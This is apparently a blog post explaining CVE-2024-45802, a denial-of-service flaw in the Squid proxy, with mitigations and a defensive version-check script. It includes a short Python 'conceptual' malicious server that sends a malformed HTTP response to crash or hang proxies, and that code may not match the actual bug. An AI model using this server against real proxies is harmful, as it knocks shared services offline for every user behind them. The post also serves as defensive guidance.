Squid is a popular open-source caching proxy. It helps people and companies speed up web browsing, control internet access, and save bandwidth. Many businesses, schools, and ISPs use Squid to handle HTTP, HTTPS, FTP, and other protocols. But recently, security researchers found a serious vulnerability in Squid. Officially listed as CVE-2024-45802, this flaw puts users at risk of Denial of Service (DoS) attacks—potentially knocking users offline or blocking access to important services.
This post explains what the bug is, how attackers can exploit it, and how you can protect your Squid servers. We’ll use clear language, code snippets, and direct links to the official resources.
What is CVE-2024-45802?
- Vulnerability ID: CVE-2024-45802
- Product: Squid caching proxy
- Discovered in: Version 6.9 and earlier
- Fixed in: Squid 6.10 (default build)
How the Bug Works
Squid acts as a “middleman” between clients (like browsers) and servers on the internet. When a client makes a request, Squid fetches it from the real server, caches it, and passes the response to the client.
The CVE-2024-45802 vulnerability involves the way Squid handles unexpected or badly formed HTTP messages from upstream servers. Specifically:
- Squid does not properly check some inputs from the server.
- Sometimes, it releases resources (like memory or connection handles) too soon or fails to release them at all.
- Result: Attackers running a “trusted” web server can send specially crafted responses that cause Squid to crash or stall, blocking all clients who rely on it.
In other words: If you use Squid as your gateway, and you access (even accidentally) a malicious or buggy server, it can take down your proxy. No one using that Squid instance can browse until it’s restarted.
Exploitation Details
While attacks require the attacker to control a server that your Squid proxy accesses (or to compromise one), this is not a high bar in enterprise, ISP, or school situations. For example, just browsing to a bad site or loading a tainted ad could trigger the bug if the proxy fetches from the attacker’s server.
1. The attacker controls evil-server.com.
2. A client (behind Squid) requests an innocent-looking page that fetches data from evil-server.com.
Proof of Concept
Here's a conceptual Python script for a malicious server that might trip up a vulnerable Squid proxy. For demonstration purposes only—do not use against others!
```python
# Simple malicious HTTP server to crash vulnerable Squid proxies (CVE-2024-45802 concept)
import socket

HOST, PORT = '...', 8888

with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
    s.bind((HOST, PORT))
    s.listen(1)
    print(f"Listening on {HOST}:{PORT} ...")
    conn, addr = s.accept()
    with conn:
        print('Connected by', addr)
        # Send incomplete/malformed HTTP response
        malicious_response = (
            "HTTP/1.1 200 OK\r\n"
            "Content-Length: 999999999\r\n"  # Unrealistic content length
            "\r\n"
            "Partial data with missing ending"  # No valid end
        )
        conn.sendall(malicious_response.encode())
        conn.close()
```
A vulnerable Squid proxy fetching from this server may free resources early or hang indefinitely, affecting all users.
- Squid Security Advisory (Fixed in 6.10): Squid official changelog v6.10
- CVE Database Entry: NIST CVE-2024-45802, Xforce Exchange
- Squid Main Site
1. Update to version 6.10 or later. The bug is fixed in the default build configuration of 6.10.
   See: Squid 6.10 Download
2. If you must use earlier versions, try *not* to cache unknown or untrusted servers, but this is risky and not always practical.
3. Monitor your proxy and logs for crashes or strange stalls after fetching content from external servers.
4. Limit access to the proxy, if possible, to reduce the risk from internal threats or compromised trusted servers.
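To check a fleet against the upgrade advice above, the following added example (not code from the original post or from the Squid project) classifies a proxy from the text printed by `squid -v`. It compares versions numerically so that 6.10 is not mistaken for something older than 6.9. The sample outputs are constructed, and the `--enable-esi` check is an assumption drawn from the upstream advisory about what "default build" means, which this page does not spell out.

```python
import re

FIXED = (6, 10)  # first fixed release according to the page (default build)

# Constructed `squid -v` outputs for illustration; not captured from real hosts.
SAMPLES = {
    "old": "Squid Cache: Version 6.9\nService Name: squid\n"
           "configure options:  '--prefix=/usr' '--sysconfdir=/etc/squid'\n",
    "fixed": "Squid Cache: Version 6.10\nService Name: squid\n"
             "configure options:  '--prefix=/usr' '--sysconfdir=/etc/squid'\n",
    "fixed_esi": "Squid Cache: Version 6.10\nService Name: squid\n"
                 "configure options:  '--prefix=/usr' '--enable-esi'\n",
}


def parse_squid_v(text):
    """Return (version tuple, list of configure options) from `squid -v` text."""
    m = re.search(r"^Squid Cache: Version (\d+(?:\.\d+)*)", text, re.M)
    if not m:
        raise ValueError("no 'Squid Cache: Version' line found")
    version = tuple(int(part) for part in m.group(1).split("."))
    opts = re.search(r"^configure options:(.*)$", text, re.M)
    options = re.findall(r"'([^']*)'", opts.group(1)) if opts else []
    return version, options


def assess(text):
    """Classify a build as 'vulnerable', 'review' or 'ok' for CVE-2024-45802."""
    version, options = parse_squid_v(text)
    # Compare as integer tuples: as strings, "6.10" sorts before "6.9" and a
    # patched proxy would be reported as vulnerable.
    if version < FIXED:
        return "vulnerable"
    # Assumption (from the upstream advisory, not this page): the fix applies
    # to default builds, so a build that re-enables ESI needs manual review.
    if "--enable-esi" in options:
        return "review"
    return "ok"


if __name__ == "__main__":
    for name, output in SAMPLES.items():
        print(f"{name}: {assess(output)}")
```

On a live proxy, pass the captured output of `squid -v` to `assess()` in place of the constructed samples.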
Conclusion
CVE-2024-45802 shows how even mature, trusted software like Squid can have tricky bugs with major real-life impact. Denial of service can be catastrophic, especially when trusted infrastructure like a proxy goes down. The fix is available. If you run Squid, update to version 6.10 immediately and keep your server maintained.
Links
- Squid Security Advisories
- Squid Download Page
- Full Changelog for Squid 6.10
Timeline
Published on: 10/28/2024 15:15:04 UTC
Last modified on: 01/03/2025 12:15:26 UTC